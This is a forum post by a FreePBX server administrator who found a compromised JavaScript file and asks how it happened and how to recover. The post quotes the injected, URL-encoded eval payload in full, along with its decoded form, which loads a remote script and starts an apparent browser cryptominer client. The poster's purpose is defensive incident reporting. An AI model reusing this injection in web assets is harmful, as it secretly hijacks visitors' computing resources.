Hello all. I’m getting the following warning on one of my servers:
Module: “FreePBX Framework”, File: “/var/www/html/admin/assets/js/modgettext.js altered”.
Seems like I may have been compromised. Any ideas how this may have happened? I had the admin portal open to the internet, both on http and https, but I wouldn’t expect a bad actor to be able to modify my files in simply due to that.
I checked the file and I noticed this errant, clearly obfuscated and harmful, line quite a bit below the normal bottom of the file:
eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%65%76%61%6C%28%75%6E%65%73%63%61%70%65%28%5C%27%25%36%34%25%36%46%25%36%33%25%37%35%25%36%44%25%36%35%25%36%45%25%37%34%25%32%45%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%32%38%25%32%37%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%32%30%25%37%33%25%37%32%25%36%33%25%33%44%25%32%32%25%36%38%25%37%34%25%37%34%25%37%30%25%37%33%25%33%41%25%32%46%25%32%46%25%37%37%25%37%37%25%37%37%25%32%45%25%36%38%25%36%46%25%37%33%25%37%34%25%36%39%25%36%45%25%36%37%25%36%33%25%36%43%25%36%46%25%37%35%25%36%34%25%32%45%25%37%32%25%36%31%25%36%33%25%36%39%25%36%45%25%36%37%25%32%46%25%35%37%25%35%39%25%35%41%25%37%37%25%32%45%25%36%41%25%37%33%25%32%32%25%33%45%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45%25%35%43%25%36%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45%25%35%43%25%36%45%25%32%30%25%32%30%25%32%30%25%32%30%25%37%36%25%36%31%25%37%32%25%32%30%25%35%46%25%36%33%25%36%43%25%36%39%25%36%35%25%36%45%25%37%34%25%32%30%25%33%44%25%32%30%25%36%45%25%36%35%25%37%37%25%32%30%25%34%33%25%36%43%25%36%39%25%36%35%25%36%45%25%37%34%25%32%45%25%34%31%25%36%45%25%36%46%25%36%45%25%37%39%25%36%44%25%36%46%25%37%35%25%37%33%25%32%38%25%35%43%25%32%37%25%33%30%25%33%30%25%33%35%25%33%30%25%33%39%25%33%31%25%36%31%25%36%31%25%33%38%25%33%33%25%36%35%25%33%32%25%33%36%25%33%35%25%33%32%25%36%33%25%33%39%25%36%36%25%36%36%25%33%31%25%33%30%25%33%33%25%36%36%25%33%38%25%33%38%25%36%31%25%36%35%25%33%37%25%33%37%25%33%37%25%33%33%25%33%37%25%36%34%25%33%32%25%33%35%25%33%32%25%33%31%25%33%34%25%36%35%25%36%35%25%36%33%25%36%36%25%36%34%25%33%38%25%36%33%25%33%36%25%33%30%25%33%31%25%36%32%25%33%37%25%33%37%25%33%37%25%33%33%25%33%33%25%33%35%25%33%31%25%36%34%25%33%36%25%33%35%25%36%33%25%33%38%25%33%32%25%33%38%25%33%30%25%35%43%25%32%37%25%32%43%25%32%30%25%37%42%25%35%43%25%36%45%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%37%34%25%36%38%25%37%32%25%36%46%25%37%34%25%37%34%25%36%43%25%36%35%25%33%41%25%32%30%25%33%30%25%32%43%25%32%30%25%36%33%25%33%41%25%32%30%25%35%43%25%32%37%25%37%37%25%35%43%25%32%37%25%32%43%25%32%30%25%36%31%25%36%34%25%37%33%25%33%41%25%32%30%25%33%30%25%35%43%25%36%45%25%32%30%25%32%30%25%32%30%25%32%30%25%37%44%25%32%39%25%33%42%25%35%43%25%36%45%25%32%30%25%32%30%25%32%30%25%32%30%25%35%46%25%36%33%25%36%43%25%36%39%25%36%35%25%36%45%25%37%34%25%32%45%25%37%33%25%37%34%25%36%31%25%37%32%25%37%34%25%32%38%25%32%39%25%33%42%25%35%43%25%36%45%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45%25%32%37%25%32%39%25%33%42%5C%27%29%29%3B%3C%2F%73%63%72%69%70%74%3E%27%29%3B'));
Which, when unescaped a couple times, gives us something like:
document.write('\x3Cscript type="text/javascript">eval(`document.write('\x3Cscript src="https://www.hostingcloud.racing/WYZw.js">\x3C/script>\\n\x3Cscript>\\n var _client = new Client.Anonymous(\\'005091aa83e2652c9ff103f88ae77737d25214eecfd8c601b7773351d65c8280\\', {\\n throttle: 0, c: \\'w\\', ads: 0\\n });\\n _client.start();\\n\x3C/script>');\\`);\x3C/script>');
I can’t see the script at https://www.hostingcloud.racing/WYZw.js
but I’m sure it’s not good.
Do you have any recommendations on further places to check for potential methods used to modify this file? Or what this script might actually be doing? I can’t access the script at the URL, but the site is still online.
Looks like that file was last modified 3 days ago.
Any suggestions or thoughts? If not, I figured it would be good to at least get this out there for any of the security experts to be aware of.
Also, do you think this calls for a total reinstall, or could I simply revert to a backup from a week ago and be sure to update any potentially out of date modules?